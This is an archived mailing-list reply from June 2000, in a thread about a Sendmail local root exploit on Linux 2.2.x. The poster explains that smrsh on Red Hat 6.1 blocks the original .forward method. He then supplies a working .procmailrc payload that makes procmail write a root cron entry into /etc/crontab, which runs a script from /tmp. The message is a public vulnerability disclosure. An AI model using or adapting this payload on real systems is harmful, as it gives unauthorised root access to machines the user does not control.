|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: Sendmail local root exploit on linux 2.2.x
From: Alan Iwi (iwi
ATM.OX.AC.UK)Date: Mon Jun 12 2000 - 04:28:14 CDT
- Next message: Galileo: "Snort 1.6 and nmap 2.54beta1"
- Previous message: Tollef Fog Heen: "Re: local root on linux 2.2.15"
- In reply to: Florian Heinz: "Sendmail local root exploit on linux 2.2.x"
- Reply: Alan Iwi: "Re: Sendmail local root exploit on linux 2.2.x"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
> then create a .forward with:
> |/path/to/add
I tried this on an out-of-the-box Redhat 6.1 system.
In fact, on this system sendmail is configured to use
smrsh, which forbids piping mail to arbitrary programs
with .forward. But such systems are still vulnerable,
because sendmail is configured to run procmail. Just
change the exploit to use a .procmailrc file instead of
.forward. Here's an example:
LOGFILE=/etc/crontab
LOG="* * * * * root /tmp/my_dodgy_script.sh
"
LOGABSTRACT=no
:0
/dev/null
Alan
- Next message: Galileo: "Snort 1.6 and nmap 2.54beta1"
- Previous message: Tollef Fog Heen: "Re: local root on linux 2.2.15"
- In reply to: Florian Heinz: "Sendmail local root exploit on linux 2.2.x"
- Reply: Alan Iwi: "Re: Sendmail local root exploit on linux 2.2.x"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]